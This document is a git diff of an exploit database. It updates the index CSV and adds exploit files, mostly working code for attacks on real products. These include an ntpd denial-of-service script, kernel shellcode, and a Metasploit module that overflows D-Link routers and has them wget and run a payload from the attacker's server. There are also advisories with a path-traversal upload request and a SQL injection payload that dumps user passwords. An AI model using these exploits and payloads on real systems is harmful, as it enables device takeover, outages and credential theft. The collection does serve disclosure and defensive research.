@@ -30836,7 +30841,7 @@ id,file,description,date,author,platform,type,port 30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 -30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - Manufacturer.php SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 +30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - 'manufacturer.php' SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0 30102,platforms/php/webapps/30102.php,"Pheap 2.0 - config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0 30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 - Archives.php SQL Injection",2007-03-16,Serapis.net,php,webapps,0 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Persistent Cross-Site Scripting in Multiple Parameters",2013-12-11,sajith,php,webapps,0 
@@ -31307,10 +31312,10 @@ id,file,description,date,author,platform,type,port 30961,platforms/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 - 'function.php' Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0 30962,platforms/php/webapps/30962.txt,"MilliScripts - 'dir.php' Cross-Site Scripting",2007-12-31,"Jose Luis Gangora Fernandez",php,webapps,0 30963,platforms/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",asp,webapps,0 -30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 - user/remindPassword return Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 -30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - category q Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 -30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - order return Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 -30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - user/remindComplete email Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 +30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 +30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - 'q' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 +30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 +30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - 'email' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0 30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - 'wp-admin/edit.php' backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 
@@ -35190,7 +35195,7 @@ id,file,description,date,author,platform,type,port 37308,platforms/php/webapps/37308.txt,"Ruubikcms 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 -37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 +37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - modules.php URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0 
@@ -35744,7 +35749,7 @@ id,file,description,date,author,platform,type,port 38236,platforms/php/webapps/38236.txt,"gpEasy CMS - 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 38237,platforms/php/webapps/38237.txt,"WordPress Theme Chocolate WP - Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injection",2013-01-25,AkaStep,php,webapps,0 -38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80 +38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection",2015-09-18,jsass,php,webapps,80 38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0 38246,platforms/php/webapps/38246.txt,"iCart Pro - 'section' Parameter SQL Injection",2013-01-25,n3tw0rk,php,webapps,0 38251,platforms/php/webapps/38251.txt,"WordPress Plugin WP-Table Reloaded - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 
@@ -36792,4 +36797,11 @@ id,file,description,date,author,platform,type,port 40783,platforms/php/webapps/40783.txt,"Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0 40776,platforms/php/webapps/40776.txt,"EditMe CMS - Cross-Site Request Forgery (Add New Admin)",2016-11-18,Vulnerability-Lab,php,webapps,0 40791,platforms/php/webapps/40791.txt,"ScriptCase 8.1.053 - Multiple Vulnerabilities",2016-11-20,hyp3rlinx,php,webapps,0 -40792,platforms/php/webapps/40792.txt,"CMS Made Simple 2.1.5 - Cross-Site Scripting",2016-11-01,"liu zhu",php,webapps,0 +40794,platforms/java/webapps/40794.txt,"Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal",2016-11-21,"Julien Ahrens",java,webapps,0 +40795,platforms/php/webapps/40795.html,"WordPress Plugin Instagram Feed 1.4.6.2 - Cross-Site Request Forgery",2016-11-21,"Sipke Mellema",php,webapps,80 +40799,platforms/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",python,webapps,80 +40800,platforms/php/webapps/40800.txt,"LEPTON 2.2.2 - SQL Injection",2016-11-21,"Curesec Research Team",php,webapps,80 +40801,platforms/php/webapps/40801.txt,"LEPTON 2.2.2 - Remote Code Execution",2016-11-21,"Curesec Research Team",php,webapps,80 +40802,platforms/php/webapps/40802.txt,"FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery",2016-11-21,"Curesec Research Team",php,webapps,80 +40803,platforms/php/webapps/40803.txt,"FUDforum 3.0.6 - Local File Inclusion",2016-11-21,"Curesec Research Team",php,webapps,80 +40804,platforms/php/webapps/40804.txt,"Wordpress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps,0 diff --git a/platforms/java/webapps/40794.txt b/platforms/java/webapps/40794.txt new file mode 100755 index 000000000..05066850b --- /dev/null +++ b/platforms/java/webapps/40794.txt 
@@ -0,0 +1,137 @@ +RCE Security Advisory +https://www.rcesecurity.com + + +1. ADVISORY INFORMATION +======================= +Product: AppFusions Doxygen for Atlassian Confluence +Vendor URL: www.appfusions.com +Type: Path Traversal [CWE-22] +Date found: 2016-06-23 +Date published: - +CVSSv3 Score: 6.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L) +CVE: - + + +2. CREDITS +========== +This vulnerability was discovered and researched by Julien Ahrens from +RCE Security. + + +3. VERSIONS AFFECTED +==================== +AppFusions Doxygen for Atlassian Confluence v1.3.0 +older versions may be affected too. + + +4. INTRODUCTION +=============== +With Doxygen in Confluence, you can embed full-structure code documentation: +-Doxygen blueprint in Confluence to allow Doxygen archive imports +-Display documentation from annotated sources such as Java (i.e., JavaDoc), + C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and +UNO/OpenOffice + flavors), Fortran, VHDL, Tcl, D in Confluence. +-Navigation supports code structure (classes, hierarchies, files), element + dependencies, inheritance and collaboration diagrams. +-Search documentation from within Confluence +-Restrict access to who can see/add what +-Doxygen in JIRA also available + +(from the vendor's homepage) + + +5. VULNERABILITY DETAILS +======================== +The application offers the functionality to import zipped Doxygen +documentations via a file upload to make them available within a +Confluence page. However the application does not properly validate the +"tempId" parameter, which represents the directory where the contents of +the uploaded file will be extracted and stored to. This leads to a path +traversal vulnerability when "/../" sequences are used as part of the +"tempId" parameter. Since the contents of the uploaded file are +extracted to the traversed directory, this vulnerability could also lead +to Remote Code Execution. 
+ +In DoxygenUploadServlet.java (lines 63-64) the "tempId" parameter is +read as part of a GET request to "/plugins/servlet/doxygen/upload" and +afterwards used in a "getTemporaryDirectory()" call: + +String tempId = request.getParameter("tempId"); +String destination = +this.doxygenManager.getTemporaryDirectory(tempId).getAbsolutePath(); + +The "getTemporaryDirectory()" function is defined in +DefaultDoxyGenManager.java (lines 38-41) and constructs a file object +based on the "java.io.tmpdir" variable, the static string +"/doxygen-temp/", the user-supplied "tempId" and a file separator in +between all parts: + +public File getTemporaryDirectory(String tempId) { + File file = new File(System.getProperty("java.io.tmpdir") + +File.separator + "doxygen-temp" + File.separator + tempId); + return file; +} + +In the subsequent code the uploaded file as represented by the "file" +HTTP POST parameter to "/plugins/servlet/doxygen/upload" is extracted to +the directory which was built using the "file" object. 
+ +The following Proof-of-Concept triggers this vulnerability by uploading +a zipped file, which will be extracted to "/home/confluence" by the +application: + +POST +/plugins/servlet/doxygen/upload?tempId=/../../../../../../home/confluence +HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 +Firefox/46.0 +Accept: application/json +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Cache-Control: no-cache +X-Requested-With: XMLHttpRequest +Content-Length: 966 +Content-Type: multipart/form-data; +boundary=---------------------------62841490314755966452122422550 +Cookie: doc-sidebar=300px; doxygen_width=256; +JSESSIONID=75A487B49F38A536358C728B1BE5A9E1 +Connection: close + +-----------------------------62841490314755966452122422550 +Content-Disposition: form-data; name="file"; filename="Traversal.zip" +Content-Type: application/zip + +[zipped data] +-----------------------------98001232218371736091795669059-- + + +6. RISK +======= +To successfully exploit this vulnerability the attacker must be +authenticated and must have the rights within Atlassian Confluence to +upload Doxygen files (default). + +The vulnerability allows remote attackers to upload arbitrary files to +any destination directory writeable by the user of the web server, which +could lead to Remote Code Execution. + + +7. SOLUTION +=========== +Update to AppFusions Doxygen for Atlassian Confluence v1.3.4 + + +8. 
REPORT TIMELINE (DD/MM/YYYY) +=============================== +23/06/2016: Discovery of the vulnerability +23/06/2016: Notified vendor via public security mail address +29/06/2016: No response, sent out another notification w/o details +29/06/2016: Response from vendor who asked for full details +30/06/2016: Sent over preliminary advisory with full details +03/07/2016: No response from vendor, sent out a status request +03/07/2016: Vendor temporarily removes product from website +11/07/2016: Vendor releases v1.3.1 which fixes the issue +20/11/2016: Advisory released diff --git a/platforms/linux/dos/40806.py b/platforms/linux/dos/40806.py new file mode 100755 index 000000000..2e413f9d4 --- /dev/null +++ b/platforms/linux/dos/40806.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +# Exploit Title: ntpd remote pre-auth Denial of Service +# Date: 2016-11-21 +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: http://dumpco.re/cve-2016-7434/ +# Vendor Homepage: http://www.ntp.org/ +# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p8.tar.gz +# Version: ntp-4.2.7p22, up to but not including ntp-4.2.8p9, and ntp-4.3.0 up to, but not including ntp-4.3.94 +# CVE: CVE-2016-7434 + +import sys +import socket + +if len(sys.argv) != 3: + print "usage: " + sys.argv[0] + " " + sys.exit(-1) + + +payload = "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00" + +print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..." +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(payload, (sys.argv[1], int(sys.argv[2]))) +print "[+] Done!" \ No newline at end of file diff --git a/platforms/linux/local/895.c b/platforms/linux/local/895.c index 193a60cba..fe679c095 100755 
--- a/platforms/linux/local/895.c +++ b/platforms/linux/local/895.c @@ -77,17 +77,7 @@ #define MAGIC -123 unsigned char shellcode[] = -"\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00 -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 -\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20 -\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34 -\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50 -\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00 -\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11 -\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3 -\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8 -\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04 -\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3"; +"\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3"; static ltime gtime() { @@ -563,4 +553,4 @@ printf("waitpid got %d/%d\n", n, errno); cleanup(); } -// milw0rm.com [2005-03-22] +// milw0rm.com [2005-03-22] \ No newline at end of file 
diff --git a/platforms/multiple/remote/40805.rb b/platforms/multiple/remote/40805.rb new file mode 100755 index 000000000..fc7ce97bd --- /dev/null +++ b/platforms/multiple/remote/40805.rb 
@@ -0,0 +1,300 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +# Payload working status: +# MIPS: +# - all valid payloads working (the ones that we are able to send without null bytes) +# ARM: +# - inline rev/bind shell works (bind... meh sometimes) +# - stager rev/bind shell FAIL +# - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb... + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow', + 'Description' => %q{ + Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which + is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol, + which accepts arbitrarily long strings into certain XML parameters and then copies them into + the stack. + This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested + using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and + this vulnerability is present in both MIPS and ARM devices. + The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a + few load and store instructions. Because of this the payloads have to be sent unencoded, which + can cause them to fail, although the bind shell seems to work well. + For the ARM devices, the inline reverse tcp seems to work best. + Check the reference links to see the vulnerable firmware versions. 
+ }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'References' => + [ + ['CVE', '2016-6563'], + ['US-CERT-VU', '677427'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Nov/38'] + ], + 'DefaultOptions' => { 'WfsDelay' => 10 }, + 'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground (ARM target) + 'Targets' => + [ + [ 'Dlink DIR-818 / 822 / 823 / 850 [MIPS]', + { + 'Offset' => 3072, + 'LibcBase' => 0x2aabe000, # should be the same offset for all firmware versions and all routers + 'Sleep' => 0x56DF0, # sleep() offset into libuClibc-0.9.30.3.so + 'FirstGadget' => 0x4EA1C, # see comments below for gadget information + 'SecondGadget' => 0x2468C, + 'ThirdGadget' => 0x41f3c, + 'PrepShellcode1' => "\x23\xbd\xf3\xc8", # addi sp,sp,-3128 + 'PrepShellcode2' => "\x03\xa0\xf8\x09", # jalr sp + 'BranchDelay' => "\x20\x84\xf8\x30", # addi a0,a0,-2000 (nop) + 'Arch' => ARCH_MIPSBE, + 'Payload' => + { + 'BadChars' => "\x00", + 'EncoderType' => Msf::Encoder::Type::Raw # else it will fail with SIGILL, this CPU is crippled + }, + } + ], + [ 'Dlink DIR-868 (rev. 
B and C) / 880 / 885 / 890 / 895 [ARM]', + { + 'Offset' => 1024, + 'LibcBase' => 0x400DA000, # we can pick any xyz in 0x40xyz000 (an x of 0/1 works well) + 'System' => 0x5A270, # system() offset into libuClibc-0.9.32.1.so + 'FirstGadget' => 0x18298, # see comments below for gadget information + 'SecondGadget' => 0x40CB8, + 'Arch' => ARCH_ARMLE, + } + ], + ], + 'DisclosureDate' => 'Nov 7 2016', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(80), + OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']), + OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']), + OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']), + OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']), + OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']), + ], self.class) + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/HNAP1/', + 'method' => 'POST', + 'Content-Type' => 'text/xml', + 'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' } + }) + + if res && res.code == 500 + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Safe + end + + def calc_encode_addr (offset, big_endian = true) + if big_endian + [(target['LibcBase'] + offset).to_s(16)].pack('H*') + else + [(target['LibcBase'] + offset).to_s(16)].pack('H*').reverse + end + end + + def prepare_shellcode_arm (cmd) + #All these gadgets are from /lib/libuClibc-0.9.32.1.so, which is the library used for all versions of firmware for all ARM routers + + #first_gadget (pops system() address into r3, and second_gadget into PC): + #.text:00018298 LDMFD SP!, {R3,PC} + + #second_gadget (puts the stack pointer into r0 and calls system() at r3): + #.text:00040CB8 MOV R0, SP + #.text:00040CBC BLX R3 + + #system() (Executes argument in r0 (our stack pointer) + #.text:0005A270 system + + #The final payload 
will be: + #'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command + shellcode = rand_text_alpha(target['Offset']) + # filler + "\xff\xff\xff\xff" + # n integer overwrite (see advisory) + rand_text_alpha(16) + # moar filler + rand_text_alpha(4) + # r11 + calc_encode_addr(target['FirstGadget'], false) + # first_gadget + calc_encode_addr(target['System'], false) + # system() address + calc_encode_addr(target['SecondGadget'], false) + # second_gadget + cmd # our command + end + + def prepare_shellcode_mips + #All these gadgets are from /lib/libuClibc-0.9.30.3.so, which is the library used for all versions of firmware for all MIPS routers + + # is at 56DF0 + + #first gadget - execute sleep and call second_gadget + #.text:0004EA1C move $t9, $s0 <- sleep() + #.text:0004EA20 lw $ra, 0x20+var_4($sp) <- second_gadget + #.text:0004EA24 li $a0, 2 <- arg for sleep() + #.text:0004EA28 lw $s0, 0x20+var_8($sp) + #.text:0004EA2C li $a1, 1 + #.text:0004EA30 move $a2, $zero + #.text:0004EA34 jr $t9 + #.text:0004EA38 addiu $sp, 0x20 + + #second gadget - put stack pointer in a1: + #.text:0002468C addiu $s1, $sp, 0x58 + #.text:00024690 li $s0, 0x44 + #.text:00024694 move $a2, $s0 + #.text:00024698 move $a1, $s1 + #.text:0002469C move $t9, $s4 + #.text:000246A0 jalr $t9 + #.text:000246A4 move $a0, $s2 + + #third gadget - call $a1 (stack pointer): + #.text:00041F3C move $t9, $a1 + #.text:00041F40 move $a1, $a2 + #.text:00041F44 addiu $a0, 8 + #.text:00041F48 jr $t9 + #.text:00041F4C nop + + #When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (2000+ bytes), we can jump back to the beggining of the buffer. 
+ #prep_shellcode_1: 23bdf7a8 addi sp,sp,-3128 + #prep_shellcode_2: 03a0f809 jalr sp + #branch_delay: 2084f830 addi a0,a0,-2000 + + #The final payload will be: + #shellcode + 'a' * (2064 - shellcode.size) + sleep() + '%31' * 4 + '%32' * 4 + '%33' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay + shellcode = payload.encoded + # exploit + rand_text_alpha(target['Offset'] - payload.encoded.length) + # filler + calc_encode_addr(target['Sleep']) + # s0 + rand_text_alpha(4) + # s1 + rand_text_alpha(4) + # s2 + rand_text_alpha(4) + # s3 + calc_encode_addr(target['ThirdGadget']) + # s4 (third gadget) + calc_encode_addr(target['FirstGadget']) + # initial pc / ra (first_gadget) + rand_text_alpha(0x1c) + # filler + calc_encode_addr(target['SecondGadget']) + # second_gadget + rand_text_alpha(0x58) + # filler + target['PrepShellcode1'] + # exploit prep + target['PrepShellcode2'] + # exploit prep + target['BranchDelay'] # exploit prep + end + + def send_payload (payload) + begin + # the payload can go in the Action, Username, LoginPassword or Captcha XML tag + body = %{ + + + + + something + Admin + + #{payload} + + + +} + + res = send_request_cgi({ + 'uri' => '/HNAP1/', + 'method' => 'POST', + 'ctype' => 'text/xml', + 'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' }, + 'data' => body + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router") + end + end + + # Handle incoming requests from the server + def on_request_uri(cli, request) + #print_status("on_request_uri called: #{request.inspect}") + if (not @pl) + print_error("#{peer} - A request came in, but the payload wasn't ready yet!") + return + end + print_status("#{peer} - Sending the payload to the device...") + @elf_sent = true + send_response(cli, @pl) + end + + def exploit + print_status("#{peer} - Attempting to exploit #{target.name}") + if target == targets[0] 
+ send_payload(prepare_shellcode_mips) + else + downfile = rand_text_alpha(8+rand(8)) + @pl = generate_payload_exe + @elf_sent = false + resource_uri = '/' + downfile + + #do not use SSL + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + srv_host = Rex::Socket.source_address(rhost) + else + srv_host = datastore['SRVHOST'] + end + + service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri + print_status("#{peer} - Starting up our web service on #{service_url} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + + datastore['SSL'] = true if ssl_restore + print_status("#{peer} - Asking the device to download and execute #{service_url}") + + filename = rand_text_alpha_lower(rand(8) + 2) + cmd = "wget #{service_url} -O /tmp/#(unknown); chmod +x /tmp/#(unknown); /tmp/#(unknown) &" + + shellcode = prepare_shellcode_arm(cmd) + + print_status("#{peer} - \"Bypassing\" the device's ASLR. This might take up to 15 minutes.") + counter = 0.00 + while (not @elf_sent) + if counter % 50.00 == 0 && counter != 0.00 + print_status("#{peer} - Tried #{counter.to_i} times in #{(counter * datastore['SLEEP'].to_f).to_i} seconds.") + end + send_payload(shellcode) + sleep datastore['SLEEP'].to_f # we need to be in the LAN, so a low value (< 1s) is fine + counter += 1 + end + print_status("#{peer} - The device downloaded the payload after #{counter.to_i} tries / #{(counter * datastore['SLEEP'].to_f).to_i} seconds.") + end + end +end \ No newline at end of file diff --git a/platforms/php/webapps/40792.txt b/platforms/php/webapps/40792.txt deleted file mode 100755 index 743230257..000000000 --- a/platforms/php/webapps/40792.txt +++ /dev/null 
@@ -1,21 +0,0 @@ - Exploit Title: CMS made simple Persistent XSS vulnerability -Date:2016-11-01 -Exploit Author: liu zhu -Vendor Homepage:http://www.cmsmadesimple.org/ -Software Link:http://101.110.118.22/s3.amazonaws.com/cmsms/downloads/13469/cmsms-2.1.5-install.zip -Version:2.1.5 -Tested on:chrome/firefox - -details: -Adminlog.php is used to record the operation log of the administrator and the -website editor. It does not filter the XSS script. So The website editors(lower -Privilege user) can attack the administrator, such as XSS phishing,CSRF. - -The steps to reproduce are below: -1. The website editor logs in and click "Content->news". input any XSS script(such as "") in title and submit. - -2. Then the administrator log in and click "site admin- admin log" , the XSS script will be triggered. - -Affact: -The vulnerability can be used to XSS Phishing or Cookie stolen attack - diff --git a/platforms/php/webapps/40795.html b/platforms/php/webapps/40795.html new file mode 100755 index 000000000..39666d5d3 --- /dev/null +++ b/platforms/php/webapps/40795.html @@ -0,0 +1,71 @@ + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + diff --git a/platforms/php/webapps/40800.txt b/platforms/php/webapps/40800.txt new file mode 100755 index 000000000..4f0afb634 --- /dev/null +++ b/platforms/php/webapps/40800.txt 
@@ -0,0 +1,113 @@ +Security Advisory - Curesec Research Team + +1. Introduction + +Affected Product: LEPTON 2.2.2 stable +Fixed in: 2.3.0 +Fixed Version Link: http://www.lepton-cms.org/posts/ + important-lepton-2.3.0-101.php +Vendor Website: http://www.lepton-cms.org/ +Vulnerability Type: SQL Injection +Remote Exploitable: Yes +Reported to vendor: 09/05/2016 +Disclosed to 11/10/2016 +public: +Release mode: Coordinated Release +CVE: n/a +Credits Tim Coen of Curesec GmbH + +2. Overview + +Lepton is a content management system written in PHP. In version 2.2.2, it is +vulnerable to multiple SQL injections. The injections require a user account +with elevated privileges. + +3. Details + +SQL Injection: Search Page + +CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P + +Description: The "terms" parameter of the page search is vulnerable to SQL +Injection. A user account with the right "Pages" is required to access this +feature. + +Proof of Concept: + +POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken= +3f7020b05ec343675b6b2z1472137594 HTTP/1.1 Host: localhost Accept-Language: +en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID= +fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12 +Connection: close Content-Type: application/x-www-form-urlencoded +Content-Length: 154 search_scope=title&terms=" union select +username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 +from lep_users -- -&search=Search + +Blind or Error-based SQL Injection: Create Page + +CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P + +Description: The "parent" parameter of the create page functionality is +vulnerable to SQL Injection. A user account with the right "Pages" is required 